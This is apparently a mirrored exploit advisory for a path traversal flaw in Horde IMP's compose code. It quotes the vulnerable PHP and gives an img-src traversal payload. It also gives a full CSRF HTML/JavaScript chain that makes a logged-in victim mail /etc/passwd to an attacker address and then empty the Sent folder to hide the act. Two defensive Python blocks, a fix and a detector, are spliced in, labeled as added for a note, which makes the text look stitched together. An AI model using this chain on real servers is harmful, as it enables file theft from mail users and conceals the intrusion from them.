## https://sploitus.com/exploit?id=PACKETSTORM:225073
this is my first time sending to a mailing list so I've chosen
something easy. here goes:
    
Summary: Horde Groupware's IMP webmail component contains a path
traversal / local file inclusion vulnerability in the code that converts
a composed HTML message to MIME. A crafted <img src> makes IMP read any
file the web server process can access and attach it to the outgoing
message, which could be exploited to escalate privileges or bypass
authentication (e.g. by reading configuration or credential files).
Because the send action can be triggered from a third-party page, an
unauthenticated attacker can also exploit it through CSRF against a
logged-in user.
    
the vulnerability is in here, in IMP's compose code; $src is the value
of an <img src="..."> attribute taken from the HTML body being sent:

} elseif (strcasecmp($node->tagName, 'IMG') === 0) {
    /* Check for smileys. They live in the JS directory, under
     * the base ckeditor directory, so search for that and replace
     * with the filesystem information if found (Request
     * #13051). Need to ignore other image links that may have
     * been explicitly added by the user. */
    $js_path = strval(Horde::url($registry->get('jsuri', 'horde'), true));
    if (stripos($src, $js_path . '/ckeditor') === 0) {
        $file = str_replace(
            $js_path,
            $registry->get('jsfs', 'horde'),
            $src
        );

        if (is_readable($file)) {
            $data_part = new Horde_Mime_Part();
            $data_part->setContents(file_get_contents($file));
          ...
    
as seen, $file is derived directly from the src of an <img> in the
message we are sending. the only guard is the stripos() prefix check;
str_replace() then swaps the URL prefix for the filesystem path without
normalizing the remainder, so "../" segments pass straight through to
is_readable() and file_get_contents(), and the contents of any file the
web server process can read become a MIME part of the message being
composed. to reach the sink we only have to satisfy the prefix check,
which means the src must start with the install's full js URL exactly
as Horde::url(..., true) builds it (scheme and host included, followed
by /ckeditor). our (elementary) exploit is thus:
--
<img src="https://webmail.foo.com/js/ckeditor/../../../../../../etc/hosts">
--
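To make the defect concrete, here is a Python model of the check above, written as an added example for this note (it is not the advisory's code and not Horde's). The vulnerable path is reproduced as a case-insensitive prefix test followed by a textual prefix swap; a hardened variant normalizes the resulting path and requires it to stay under the ckeditor directory. The install URL, filesystem location and file names are assumed values for an example install.

```python
# Added example, not Horde's code: a Python model of IMP's smiley lookup.
# JS_URL stands in for Horde's 'jsuri' (public URL of the js dir) and JS_FS
# for 'jsfs' (its filesystem location); both are assumed values.
import posixpath
from typing import Optional
from urllib.parse import urlsplit

JS_URL = "https://webmail.foo.com/horde/js"
JS_FS = "/var/www/horde/js"
CKEDITOR_DIR = posixpath.join(JS_FS, "ckeditor")


def resolve_smiley_vulnerable(src: str) -> Optional[str]:
    """Mirror of the vulnerable logic: case-insensitive prefix check (stripos),
    then a plain textual replacement of the URL prefix (str_replace).
    Any '..' segments after the prefix are carried into the filesystem path."""
    if not src.lower().startswith((JS_URL + "/ckeditor").lower()):
        return None                      # not a smiley: IMP leaves the img alone
    # str_replace is case-sensitive, so a differently cased prefix would be
    # left as a URL (and is_readable() would then fail); a matching prefix is
    # swapped verbatim, '..' and all.
    return src.replace(JS_URL, JS_FS)


def effective_path(path: str) -> str:
    """What the OS actually opens: '.' and '..' segments collapsed (symlinks ignored)."""
    return posixpath.normpath(path)


def resolve_smiley_hardened(src: str) -> Optional[str]:
    """Same prefix test, but the remainder is taken from the URL path only,
    normalized, and rejected unless it stays inside the ckeditor directory."""
    if not src.lower().startswith((JS_URL + "/ckeditor").lower()):
        return None
    rel = urlsplit(src).path[len(urlsplit(JS_URL).path):]   # e.g. "/ckeditor/x.png"
    candidate = posixpath.normpath(JS_FS + rel)
    # Containment check on the normalized path. A production fix should also
    # run realpath() so that a symlink inside the js tree cannot escape it.
    if candidate != CKEDITOR_DIR and not candidate.startswith(CKEDITOR_DIR + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed inputs: the exploit shape and a legitimate smiley.
    attack = "https://webmail.foo.com/horde/js/ckeditor/../../../../../etc/passwd"
    smiley = "https://webmail.foo.com/horde/js/ckeditor/plugins/smiley/images/regular_smile.png"
    for src in (attack, smiley):
        vuln = resolve_smiley_vulnerable(src)
        print(src)
        print("  vulnerable ->", vuln, "(opens", effective_path(vuln) + ")")
        print("  hardened   ->", resolve_smiley_hardened(src))
```

Note that the hardened variant only changes what happens after the prefix test passes: user-added external images are still ignored exactly as before, so the original intent of the code (Request #13051) is preserved.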
this is likely very chainable with any other existing primitive to
achieve rce on horde IMP. for example, here's an easy csrf chain: it
makes a logged-in victim mail the traversed file to an attacker-controlled
address and then empties the Sent folder to hide the message. note that
the chain only fires if the victim's browser attaches the Horde session
cookie to a cross-site POST, i.e. the cookie is not SameSite=Lax or
Strict:
    
--
<!DOCTYPE html>
<html>

<body>
    <h1>yo</h1>
    <script>
        // step 1: send an HTML message whose <img> src traverses out of the
        // ckeditor directory; IMP attaches the resolved file and mails it out
        var p1 = new FormData();
        p1.append('to', 'john@evil.gov');
        // land in spam
        p1.append('subject', 'hai');
        p1.append('html', '1');
        p1.append('message',
            '<html><body>bye<img src="http://targ/horde/js/ckeditor/../../../../etc/passwd"></body></html>');
        p1.append('identity', '0');
        p1.append('priority', 'normal');
        p1.append('request_read_receipt', '0');
        p1.append('save_sent_mail', '1');
        // FormData (multipart/form-data) with no custom headers is a "simple"
        // request, so no CORS preflight; no-cors just hides the response
        fetch('http://targ/horde/services/ajax.php/imp/sendMessage', {
                method: 'POST',
                body: p1,
                credentials: 'include',
                mode: 'no-cors'
            })
            .then(() => {
                console.log("* bye");
                setTimeout(() => {
                    // step 2: empty the Sent folder so the victim never sees the message
                    var p2 = new FormData();
                    p2.append('mbox', 'U0VOVA'); // b64 SENT
                    // delete
                    fetch('http://targ/horde/services/ajax.php/imp/emptyMailbox', {
                        method: 'POST',
                        body: p2,
                        credentials: 'include',
                        mode: 'no-cors'
                    });
                }, 2000);
            });
    </script>
</body>

</html>
--
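For the defensive side, here is an added detection example (written for this note, not part of the advisory or of Horde): it scans HTML message bodies, for instance from a mail gateway or from a compromised user's Sent folder during incident response, for <img> sources that pass IMP's smiley prefix test but whose normalized path escapes the ckeditor directory. The install URL and the sample bodies are constructed assumptions; the attack sample uses the same payload shape as the CSRF chain above.

```python
# Added example, not Horde's code: flag <img src> values that target the
# Horde ckeditor smiley path but escape it with "..". HORDE_JS_URL is the
# assumed 'jsuri' of an example install.
import posixpath
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlsplit

HORDE_JS_URL = "http://targ/horde/js"


class _ImgCollector(HTMLParser):
    """Collect every <img src=...> value from an HTML body."""

    def __init__(self) -> None:
        super().__init__()
        self.srcs: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "img":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def is_smiley_traversal(src: str, js_url: str = HORDE_JS_URL) -> bool:
    """True when src would pass IMP's check (js_url + '/ckeditor', compared
    case-insensitively like stripos) but its normalized URL path leaves the
    ckeditor directory."""
    prefix = js_url + "/ckeditor"
    if not src.lower().startswith(prefix.lower()):
        return False                       # external image: IMP ignores it
    base = urlsplit(js_url).path + "/ckeditor"
    # No percent-decoding on purpose: file_get_contents() opens the bytes
    # as-is, so an encoded ".." is not a traversal on the server either.
    norm = posixpath.normpath(urlsplit(src).path)
    return not (norm == base or norm.startswith(base + "/"))


def find_traversal_imgs(html_body: str, js_url: str = HORDE_JS_URL) -> List[str]:
    """Return the offending src values found in one HTML body."""
    parser = _ImgCollector()
    parser.feed(html_body)
    return [s for s in parser.srcs if is_smiley_traversal(s, js_url)]


# Constructed sample bodies: a normal smiley, a user-added external image,
# and the exploit shape from the CSRF chain.
SAMPLES: Dict[str, str] = {
    "benign": '<p>hi <img src="http://targ/horde/js/ckeditor/plugins/smiley/images/regular_smile.png"></p>',
    "external": '<p><img src="https://example.org/logo.png"></p>',
    "attack": '<html><body>bye<img src="http://targ/horde/js/ckeditor/../../../../etc/passwd"></body></html>',
}


def scan_samples() -> Dict[str, List[str]]:
    """Run the detector over every sample body; only 'attack' should hit."""
    return {name: find_traversal_imgs(body) for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name:9s} -> {hits}")
```

Because IMP resolves the image against the configured jsuri, the detector has to be fed the real value for the install being monitored; a mismatched js_url simply yields no hits rather than false positives.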
    
PATCH:
update to Horde IMP 7.0.1, which contains the fix.